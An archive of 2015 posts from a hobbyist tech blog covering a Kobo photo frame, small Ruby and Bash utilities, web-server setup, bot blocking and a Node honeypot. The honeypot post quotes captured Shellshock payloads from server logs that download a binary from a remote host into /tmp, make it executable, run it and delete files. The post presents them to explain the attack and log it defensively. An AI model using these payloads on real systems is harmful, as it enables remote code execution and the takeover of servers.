Thursday, December 31, 2015

Live Picture Frames: A Curious Perspective

Over the past week, I converted an old Kobo ereader into a live photo frame that displays a new photo from the Curiosity rover every day. The project turned out exceptionally well!

As always, source and instructions are on GitHub.

Case removed, picture frame being prepared.

Framed and hung!

Thursday, December 3, 2015

Archiving your Pocket list with Ruby

I've been seeking a more powerful and extensible alternative to Bash, and so I've recently begun experimenting with Ruby. For my first "real" test of the language, I decided to solve a problem I had been seeking an answer to for some time: Since the web is constantly changing, how could I go through my entire reading list and ensure that I had backup copies of the articles I've saved? As it turns out, there was a fairly simple solution: only 35 lines of Ruby!

The script itself uses the Curb and Nokogiri libraries to follow URL shorteners and parse HTML to ensure that the third main component, wkhtmltopdf (a personal favorite of mine), gets the most correct data for each link. To get your Pocket data into the script, you simply use Pocket's nifty HTML export tool to get a webpage full of links to all of your saved articles. 

Using the script is extraordinarily simple: Once dependencies are installed (see the top of the script for more information on that), you simply run ruby pocket_export.rb ~/Downloads/ril_export.html and you're off! The script creates the directory pocket_export_data to store the PDFs it generates and pocket_export_errors.log to keep track of any links it has trouble with. 
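For readers who'd like to see the general shape of the approach, here's a rough sketch in Python (not the original Ruby). It assumes the export page is plain HTML with one <a href> per saved article, and it uses the standard library in place of Curb and Nokogiri. The pdf_name naming scheme is made up for illustration; only the wkhtmltopdf "URL, then output file" invocation and the directory and log names come from the description above.

```python
import re
import subprocess
import urllib.request
from html.parser import HTMLParser
from pathlib import Path


class LinkCollector(HTMLParser):
    """Collects the href of every <a> tag in the export page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)


def extract_links(html):
    """Return every link found in the export HTML, in document order."""
    collector = LinkCollector()
    collector.feed(html)
    return collector.links


def resolve(url):
    """Follow redirects (e.g. URL shorteners) and return the final URL."""
    with urllib.request.urlopen(url, timeout=30) as response:
        return response.geturl()


def pdf_name(index, url):
    """Hypothetical naming scheme: a counter plus a sanitized URL."""
    slug = re.sub(r"[^A-Za-z0-9]+", "_", url).strip("_")[:80]
    return f"{index:04d}_{slug}.pdf"


def archive(export_file, out_dir="pocket_export_data",
            error_log="pocket_export_errors.log"):
    """Render each saved link to a PDF, logging any link that fails."""
    Path(out_dir).mkdir(exist_ok=True)
    links = extract_links(Path(export_file).read_text(encoding="utf-8"))
    for index, url in enumerate(links, start=1):
        try:
            final_url = resolve(url)
            target = Path(out_dir) / pdf_name(index, final_url)
            subprocess.run(["wkhtmltopdf", final_url, str(target)], check=True)
        except Exception as error:
            with open(error_log, "a", encoding="utf-8") as log:
                log.write(f"{url}\t{error}\n")
```

Calling archive("ril_export.html") would then walk the whole list; anything that can't be fetched or rendered ends up in the error log instead of stopping the run.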


Tuesday, November 17, 2015

Language Speeds: A Quick and Dirty Test

Some time ago I decided to run a quick test to determine the performance of several popular programming languages by measuring the execution time of an algorithm to compute the greatest prime factor of a number.

The test itself was easy enough to set up and run, being no more than an implementation of a simple algorithm in several languages combined with a bash script to run them all in sequence. My findings, however, were interesting. 
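To give an idea of the kind of workload involved, here's a minimal Python sketch of a greatest-prime-factor routine using plain trial division, plus a tiny timing helper. This is an assumption about what a "simple algorithm" looks like here, not necessarily the exact code in the repository, and time_call is a hypothetical helper name.

```python
import time


def greatest_prime_factor(n):
    """Return the largest prime factor of n (n >= 2) by trial division."""
    if n < 2:
        raise ValueError("n must be at least 2")
    largest = None
    factor = 2
    # Divide out each factor completely; whatever is left above 1 is prime.
    while factor * factor <= n:
        while n % factor == 0:
            largest = factor
            n //= factor
        factor += 1
    if n > 1:
        largest = n
    return largest


def time_call(func, *args):
    """Run func(*args) once and return (result, elapsed seconds)."""
    start = time.perf_counter()
    result = func(*args)
    return result, time.perf_counter() - start
```

Porting the same loop to each language and timing it on the same input is all a test like this really needs.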

I tested the following languages on several systems I had handy: 
  • C
  • Java
  • Python
  • Ruby
  • JavaScript
Unsurprisingly, C won out for speed; its execution times were the lowest across the board, since it is compiled ahead of time to native machine code.

In second place, surprisingly, came JavaScript. Looks like V8 really is all it's cracked up to be.

Following that, Python and Ruby were fairly close in speed, and Java was slowest across the board.

I encourage you to run your own tests and post the results! The source code (along with my initial test) is on GitHub.

Saturday, August 29, 2015

IPv6 Support is Here!

Following a change in my hosting configuration, I've decided to enable IPv6! You can now connect to any of the sites hosted by CTIS with the marvelous new IPv6 protocol, provided that your ISP or tunnel provider peers with DigitalOcean. 

And on a semi-related note, general load times should be much quicker, and the site will be much more stable, since I'm no longer hosting the site from my closet on a 30/4 connection.


Thursday, July 23, 2015

Get notified when your Linux server boots.

Getting notified of things is great, and when one of your servers boots up, it's always good to know when. With that in mind, it's easy to add this feature to most any Linux or BSD server without much trouble, especially since I've already done the work for you :)

Here's an example message, from one of my servers:
Box has booted! 
System information: 
Date and time: 
Thu Jul  9 20:43:49 EDT 2015 
Uptime (length of boot): 
20:43:49 up 1 min,  0 users,  load average: 2.94, 0.98, 0.35 
Network addresses:  
Server disk usage: 
Filesystem                Size  Used Avail Use% Mounted on
/dev/mapper/Box--vg-root  1.8T  1.5T  266G  85% /

By pasting my Boot Notification Script into your /etc/rc.local, you can use your local mail server to send boot notifications with useful statistics whenever your system comes up, with minimal and straightforward configuration.

Note that this script requires a functioning mail server to be running on the system (such as Postfix), as well as the mailx utility, which can be installed from the mailutils or bsd-mailx packages. In a future post, I'll explain how you can easily send mail via Postfix using Gmail as a relay, while also keeping your domain name intact.

For initial setup, which will produce the message shown above, you only have to set 2 variables, EMAIL and LANIFACE. There is a third variable, HOST, which is automatically set using the machine's hostname.

EMAIL should contain the email address to which messages should be sent. If you like, you can add multiple addresses, separated by commas. This can be any email address, including your phone's if you'd like to get notifications via SMS.

The second is HOST. This is set automatically from the machine's hostname and requires no manual configuration.

The third is LANIFACE, which is the network interface that the LAN IP should be retrieved from. Usually, this is eth0, but it changes depending on your OS. You can run the command ip link show to get a list of your available network interfaces, if you're unsure.
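If you'd rather see the idea spelled out than paste a shell script, here's a rough Python sketch of the same flow: gather a few system facts, build a message, and hand it to the local mail server. It is not the Boot Notification Script itself. The address in EMAIL is a placeholder, the build_message and send_boot_notification names are made up, and it assumes an SMTP server is listening on localhost.

```python
import smtplib
import socket
import subprocess
from email.message import EmailMessage

EMAIL = "admin@example.com"   # placeholder; comma-separate several addresses
LANIFACE = "eth0"             # interface to report addresses for
HOST = socket.gethostname()   # set automatically, like HOST in the script


def run(command):
    """Return a command's output, or a short note if it can't be run."""
    try:
        result = subprocess.run(command, capture_output=True,
                                text=True, check=True)
        return result.stdout.strip()
    except (OSError, subprocess.CalledProcessError) as error:
        return f"(unavailable: {error})"


def build_message(host, recipients, sections):
    """Assemble the notification from (title, text) pairs."""
    message = EmailMessage()
    message["Subject"] = f"{host} has booted!"
    message["From"] = f"root@{host}"
    message["To"] = recipients
    body = [f"{host} has booted!", "System information:"]
    for title, text in sections:
        body.append(f"{title}:")
        body.append(text)
    message.set_content("\n".join(body))
    return message


def send_boot_notification():
    """Collect system details and send them through the local mail server."""
    sections = [
        ("Date and time", run(["date"])),
        ("Uptime (length of boot)", run(["uptime"])),
        ("Network addresses", run(["ip", "addr", "show", LANIFACE])),
        ("Server disk usage", run(["df", "-h", "/"])),
    ]
    with smtplib.SMTP("localhost") as smtp:
        smtp.send_message(build_message(HOST, EMAIL, sections))
```

Calling send_boot_notification() late in the boot process would play the same role as the rc.local snippet.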


On some systems, /sbin/ifconfig is not installed. This command is usually replaced with /sbin/ip, with addresses shown using the command "ip addr". 
Should this be the case, replace the code on line 52 with the following:
`/bin/ip addr | /bin/grep inet | /usr/bin/tail -n 2 | /usr/bin/head -n 1` 
Which should produce something along the lines of:
inet brd scope global eth0

Monday, July 6, 2015

Banepost.c: Easy Baneposting for the Linux Enthusiast

Have you ever been browsing your favorite online forum or social media website, when suddenly, you see the perfect opportunity to make a reference to your absolute favorite meme? 

Have you ever proceeded to throw your hands up in anguish when you suddenly realized that, nowhere in your extensive collection of images, copypasta, and everything in between, could you find that one, perfect ASCII banepost that would have made the perfect reply? 

Well then I've got the perfect software for you. 
I've tried countless other programs, but none of them flied so well, and some of them even crashed my computer, with no survivors! 

Ultimately, I became so distraught by the lack of free, open source software to solve this problem that I decided to create my own implementation of everyone's favorite Big Guy, Banepost.c, which I guarantee is better than any competing version (at least it can talk). 

It didn't matter who I was, what mattered was my plan, and that was to start a fire in the open source copypasta community that would not only tell you about Bane, but also why he wore the mask. If this were some grand crime, then getting caught is most certainly a part of my plan, and I wasn't alone in this effort. 

There are many eager young developers in the OSS with a fire in their hearts which rises as they find themselves Completely In Agreement with this effort, and that will undoubtedly lead them to create their own, high quality copypasta generating software.


Sunday, June 28, 2015

The Episorter: Taking the Monotony out of Renaming TV Episodes

I recently had to rename around 200 TV episodes on my Plex server, a daunting task that would normally involve several terribly boring hours and hundreds of mvs. That is, if I hadn't taken advantage of the power of Bash to solve my problem!

Some background

Plex is an absolutely amazing media server, and, when presented with a directory full of media files, it's generally able to match and categorize them accurately and without human intervention. However, it can be picky, especially when it comes to TV episodes. In my case, I had a couple hundred episodes of The Office that followed a naming convention that Plex didn't like, meaning that I got all the way to season 3 without realizing that I was missing nearly 10 episodes per season!

My episodes were named like so:

.../plex/TV/The Office/Season 2/Episode 3 - Office Olympics.mp4 

However, this is Plex's preferred naming scheme:

.../plex/TV/The Office/Season 2/S02E3 - Office Olympics.mp4

As a result, I whipped up a small script to save me from a future of bloodshot eyes and cramped hands, which was able to tear through the job in less than 2 minutes in total.

I call it the episorter, and it takes all the variables that it requires from the directory name (i.e. 'Season 2') and the number of episodes in the current directory, and then renames each of the episodes to align with Plex's preferred scheme.
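Here's a small Python sketch of the same renaming idea, for anyone who wants to adapt it. It is not the episorter itself: it assumes files are named "Episode N - Title.ext" inside a directory called "Season N", and it reads the episode number from each filename rather than counting the files in the directory. The function names are made up for this example.

```python
import re
from pathlib import Path

EPISODE_PATTERN = re.compile(r"^Episode (\d+)(.*)$")


def plex_name(season, filename):
    """Return the new name for one file, or None if it doesn't match."""
    match = EPISODE_PATTERN.match(filename)
    if match is None:
        return None
    episode, rest = match.groups()
    return f"S{season:02d}E{int(episode)}{rest}"


def rename_season(directory, dry_run=True):
    """Rename every matching episode in a 'Season N' directory.

    Returns a list of (old name, new name) pairs. With dry_run=True
    nothing on disk is touched, so the plan can be reviewed first.
    """
    directory = Path(directory)
    season_match = re.search(r"Season (\d+)", directory.name)
    if season_match is None:
        raise ValueError(f"no season number in {directory.name!r}")
    season = int(season_match.group(1))
    renamed = []
    for path in sorted(directory.iterdir()):
        new_name = plex_name(season, path.name)
        if new_name is None:
            continue  # leave anything that isn't an episode alone
        if not dry_run:
            path.rename(path.with_name(new_name))
        renamed.append((path.name, new_name))
    return renamed
```

Running rename_season on a season directory with the default dry_run=True only returns the planned renames; pass dry_run=False once the list looks right.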

I hope it helps somebody!

Tuesday, June 2, 2015

The LLMN Stack: A Comparison

Artist's representation of the LLMN stack.

I figured I should make a short post about my web stack.

A bit of background

I prefer lightweight and fast pieces of software that sip system resources, so it's no secret that I dearly love web servers like Lighttpd and NodeJS. I come from a background where old, slow, and obsolete hardware was all that I had available to play around with, which put system optimization at the forefront of my priorities.

My very first "server" of sorts was an original Raspberry Pi Model B. I kept it in a cabinet in my room, connected to my network via Wi-Fi. Reception was terrible, so the website I ran on it (which was hosted by Apache) was sluggish, but still just good enough to serve a 144p Shockwave Flash video of my principal dancing hilariously to some music, which my peers found super funny.

Eventually, I switched from Apache to Lighttpd, because I was also trying to use the pi as a media center with XBMC and a Samba server, and I needed a lighter weight web server (and besides, for completely static sites Apache is overkill).

In my searching, I came across Lighttpd (I don't know why I didn't find Nginx first, but I wish I had, especially since Lighty v1.5 is slow in coming) and it solved all of my problems. I would later switch back to Apache when I got a slightly nicer desktop from a computer recycling plant, but I eventually returned, once again, to Lighttpd.

About the stack

So, with speed, a small footprint, and performance in mind, LLMN is extremely close to LEMP. In fact, in benchmarks, Lighttpd and Nginx are remarkably close (though Nginx is often slightly faster).

Here are a few good benchmarks comparing them:
As noted earlier, the performance of the two servers is strikingly similar. That said, for my needs (running a small site that averages around 1k requests per day), Lighttpd is perfect. It's been rock solid, low-maintenance, and has gracefully scaled up to my needs as they have grown, and hasn't crashed once over years and years of use. I will admit, however, that I've been considering switching to Nginx recently, though I dread porting my configuration files. Incidentally, that would make this a LEMN stack :P

In fact, I was DDoSed several months ago, and my uplink bandwidth was saturated long before Lighttpd even began to use more than 2% CPU.

Besides the web servers, the other major difference between these two stacks is the choice of server-side language (which, in the case of LLMN, is JavaScript instead of PHP).

There are a few good reasons for this:

I love JavaScript. It's the language of the web and has absolutely soared in popularity over the past few years. It runs everywhere, from desktops and mobile devices to servers and even microcontrollers! The ability to develop and maintain applications in a single language across both the client and server is also very alluring, and simplifies the development process considerably.

NodeJS, like Lighttpd, is fast, lightweight, and asynchronous.  Have a look at this benchmark. Or this test.

NodeJS has lots of modules, packages, and libraries available to freely use (though this is also true of PHP). There are over 153,000 packages available on npm, which is Node's package manager.

NodeJS has an enormous community. Because JavaScript runs everywhere, Node developers can get help from the entire JavaScript community while working on a project. This portability means that help and support are extremely easy to come by. As a result, Node is great for newcomers to server-side web development.

Also, these Fortune 500 companies all use Node for their backend.


The Pros

  • LLMN is fast, low-maintenance, and extremely resilient, with an incredibly small footprint.
  • NodeJS is fast, has a great community, and is extensible with lots and lots of modules and libraries. JS as a common language on both the client and server makes web development much easier.

The Cons

  • NodeJS still isn't as widely used as PHP, which powers popular platforms like WordPress.
  • While Lighttpd is fantastic for static pages or as a proxy, Apache, though heavier, is generally better at interfacing with PHP and serving dynamic content. Lighttpd is also outperformed by Nginx by a hair. Compared to Nginx, Lighttpd lacks some features. 

Sunday, May 24, 2015

Stopping Google Analytics Spammers

Any observant user of Google Analytics will have undoubtedly noticed a large amount of traffic coming from curious looking referrers, like so:

This is worrying! Not only does it completely destroy any chance of getting actual, valid traffic data from Analytics, but it also frustratingly puts your website's data in the hands of internet spammers. Ouch!

So here's a quick tip for keeping the (unfortunately) prevalent Google Analytics spammers away from your site.

First, delete and re-add your website to Analytics to get a new property ID, and retrieve your new tracking code.

Next, obfuscate your JS tracking code to keep bots from finding your site's analytics property ID.  I've been using this method for several months now and can confirm that it has no effect on the functionality of analytics and doesn't break anything.

Monday, May 11, 2015

Blocking Bad Bots in 3 Easy Steps with Lighttpd.

I figured that a good follow up to my last post would be a new one about good bot stopping practices.

In this tutorial, we'll be looking at best practices for Lighttpd, but configuration options for these tips are available in all major web servers (Apache, Nginx, IIS, etc.).

The internet is a scary place, and anyone who's even taken a cursory glance at their web server access logs will certainly have noticed the number of clearly malicious or spammy requests made to their web server. Internet scrapers and spam referrers are just some of the nasty things you're sure to see strewn about your access logs.

These bots are typically searching for exploits (an automated, brute-force process), though many others are looking for personal information such as email addresses and phone numbers to send spam to. There may also be search engines that crawl your site too frequently, making large numbers of requests at close intervals (eating bandwidth and system resources).

There are a few ways to keep this behavior under control, at least for the good robots. Any good webmaster will have undoubtedly created a good, strong robots.txt to keep out unwanted crawlers, but a shockingly large number of crawlers disregard it entirely.

A good example of this is Baidu, who, after being blocked in both my robots.txt and my web server configuration, actually went so far as to change the user agent of their web spiders to circumvent the blocks!

Because such nasty programs exist, we have to "break out the big guns" and block them in our web server config, and thankfully, Lighttpd provides plenty of options for us to do just that :)

Step one.

Grab the latest copy of my anti-spam configuration and copy it to your clipboard.

Step two.

On your server, cd to /etc/lighttpd and touch the file spam.conf. Open that file in your favorite text editor and paste in the contents of the anti-spam config. (note: you may need to su to root or use sudo to create and edit these files)

Open your lighttpd configuration file (usually /etc/lighttpd/lighttpd.conf) and add the line:

    include "spam.conf"

Step three.

Reload your web server's configuration, and restart it:

    /etc/init.d/lighttpd reload
    /etc/init.d/lighttpd restart

And just like that, a large portion of the most common offenders is blocked from your site!

Of course, this tutorial wouldn't be complete without a section on how to add your own custom rules, so I'll explain that, too!

Let's look at the three different conditional statements that you would be using to block bots and referrers from accessing your site. They are more or less self-explanatory, so here they are:
  1. $HTTP["referer"]
  2. $HTTP["useragent"]
  3. $HTTP["remoteip"]
These conditionals, when used in conjunction with one of lighttpd's conditional operators and regular expressions, give you powerful, granular control over who (or what) can access your site.
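To make the matching logic concrete, here's a small Python sketch of how rules like these decide whether a request gets blocked. This is not lighttpd configuration and not the contents of my anti-spam config; the patterns and the blocked network (a documentation-only address range) are made-up examples, and is_blocked is a hypothetical name. It only mirrors the idea: test the referer and user agent against regular expressions, and test the remote IP against a list of networks.

```python
import ipaddress
import re

# Hypothetical rules, for illustration only.
RULES = [
    ("referer", re.compile(r"(semalt|buttons-for-website)\.com")),
    ("useragent", re.compile(r"baiduspider", re.IGNORECASE)),
]
BLOCKED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]


def is_blocked(request):
    """Return True if any rule matches the request's fields.

    `request` is a dict with "referer", "useragent" and "remoteip" keys,
    named after the three lighttpd conditionals.
    """
    for field, pattern in RULES:
        # An unanchored search: the pattern may match anywhere in the value.
        if pattern.search(request.get(field, "")):
            return True
    address = ipaddress.ip_address(request["remoteip"])
    return any(address in network for network in BLOCKED_NETWORKS)
```

In the real configuration, each rule is a conditional block in the lighttpd config instead of an entry in a Python list, but the decision works the same way: first match wins, and the request is denied.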

Wednesday, April 29, 2015

Full site HTTPS is here!


Now you can browse all of these silly pages securely, without fear of certain government agencies discovering your appreciation for Nicolas Cage!

Check out my SSL test ratings (All A+s!):

Wednesday, April 22, 2015

Catching Spam Bots In the Act with Node

Have you ever been searching through your webserver's logs and noticed Chinese IPs making nasty looking requests like


    GET /cgi-bin/bash HTTP/1.1
    GET /cgi-bin/php HTTP/1.1
    GET /rom-0 HTTP/1.1


    () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget -O /tmp/;curl -O /tmp/;perl /tmp/;rm -rf /tmp/*\");'"

Or even _this_?

    () { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://123.456.7.8:911/java -O /tmp/China.Z-rmeo >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-rmeo >> /tmp/;echo /tmp/China.Z-rmeo >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\"

Though most current web servers are immune to these simple attacks (assuming, of course, that you've been keeping your packages updated), it's often interesting to see how bots attempt to exploit vulnerable services running on web servers.

In some cases, such as the log excerpts above, it's easy to see how this is achieved. The user-agent is crafted to exploit CVE-2014-6271 (AKA Shellshock), which results in some commands being run that turn our precious server into a mindless zombie :(

However, in other cases, this information is not as apparent. The default logging configuration for most web servers doesn't include other data which could potentially be used as an attack vector, such as HTTP headers!

Therefore, we'll have to write our own script to collect this data from such nasty requests and log it.

You'll need to either create a script that listens to HTTP requests and writes all those juicy details to a log file in whatever language you like (Python, PHP, Ruby, even a Perl CGI script), or find one out on the net somewhere. I'm just going to reuse one of my old projects for this, which just so happens to be written in Node. Here's the adapted version.

If you do decide to write your own script, make sure that it does the following:
  1. Accepts all incoming HTTP connections.
  2. Logs the details of those connections to a file. 
  3. Returns 200 as the response code (You attract more bots with honey than with vinegar, so make the request appear to work).
  4. Is watertight and ready to face the incoming nastiness (wouldn't want to inadvertently become a part of the botnet :P)
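If you'd like a starting point for your own, here's a minimal Python sketch that follows the four points above. It is not my Node script: the record field names, the honeypot.log filename, and the make_server helper are all made up for this example. It never executes or interprets anything it receives; it only writes the request details to a file as one JSON object per line and answers 200.

```python
import json
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class HoneypotHandler(BaseHTTPRequestHandler):
    """Logs every request's details and always answers 200."""

    log_file = "honeypot.log"  # hypothetical default; see make_server

    def _handle(self):
        record = {
            "timestamp": time.strftime("%Y:%m:%d:%H:%M:%S"),
            "request_ip": self.client_address[0],
            "method": self.command,
            "path": self.path,
            # Lower-case the header names so lookups are predictable.
            "headers": {k.lower(): v for k, v in self.headers.items()},
        }
        with open(self.log_file, "a", encoding="utf-8") as log:
            log.write(json.dumps(record) + "\n")
        body = b"OK\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)

    # Treat the common methods identically.
    do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = _handle

    def log_message(self, format, *args):
        pass  # keep the default per-request stderr logging quiet


def make_server(port=8082, log_file="honeypot.log"):
    """Build a server bound to localhost, meant to sit behind a proxy."""
    handler = type("Handler", (HoneypotHandler,), {"log_file": log_file})
    return ThreadingHTTPServer(("127.0.0.1", port), handler)
```

Starting it is a matter of make_server().serve_forever(). Binding to 127.0.0.1 is a deliberate choice here, so that only the reverse proxy can reach the script directly.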

You may also want to find out some URLs that these bots seem to check regularly, because we'll need those later for our web server configuration, but I will have some examples in this post.

I'm going to set this up on my auxiliary server, which also sits in a "residential" IP space and gets a fair amount of these bots as a result.

On to the configuration.

In your web server's configuration, set up a reverse proxy to whatever port your script is listening for requests on.

Here's one of mine (I run Lighttpd):
$HTTP["url"] == "/cgi-bin/test.cgi" {
    proxy.server = ( "" => ( (
        "host" => "",
        "port" => 8082 ) ) )
}
Pretty straightforward. We take all requests for /cgi-bin/test.cgi and proxy them to our script, which in this case is running on port 8082 on the local machine. 
Apply the configuration and use your favorite command line utility to make a request to your shiny new reverse proxy.
Here's an example output from mine:
{
    "fi_timeStamp": "2015:04:22:06:01:55",
    "fi_requestIP": "",
    "fi_method": "GET",
    "req_headers": {
        "accept": "text/html, application/xhtml+xml, */*",
        "user-agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)",
        "host": "123.456.7.8:80",
        "authorization": "Basic Og==",
        "x-forwarded-for": "432.10.54.21",
        "x-host": "123.456.7.8:80",
        "x-forwarded-proto": "http"
    }
}
Once everything is working, just sit back, relax, and keep an eye on your logs :)
UPDATE: I'll be working to keep an active list of spammer IPs available. I'll post another update when it's up.

Sunday, March 22, 2015

Unexpected SEO, or How Became #3 in Pictures of Marijuana.

So I just noticed in my webserver's logs that I was getting a lot of these requests: - [22/Mar/2015:18:25:37 -0400] "GET /resources/420/images/dank_ass_bg.jpeg HTTP/1.1" 200 395479 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"

Thousands of them, in fact. 8,141 in the past 7 days! 

Naturally, this piqued my interest, so after further inspection, I noticed that the majority of these requests had Google as a referrer, generally something along the lines of 

And that's how I realized that the background image of my Snoop Dogg page was the third result for "weed" on Google Images, and the first actual picture of marijuana for that query.

I feel successful.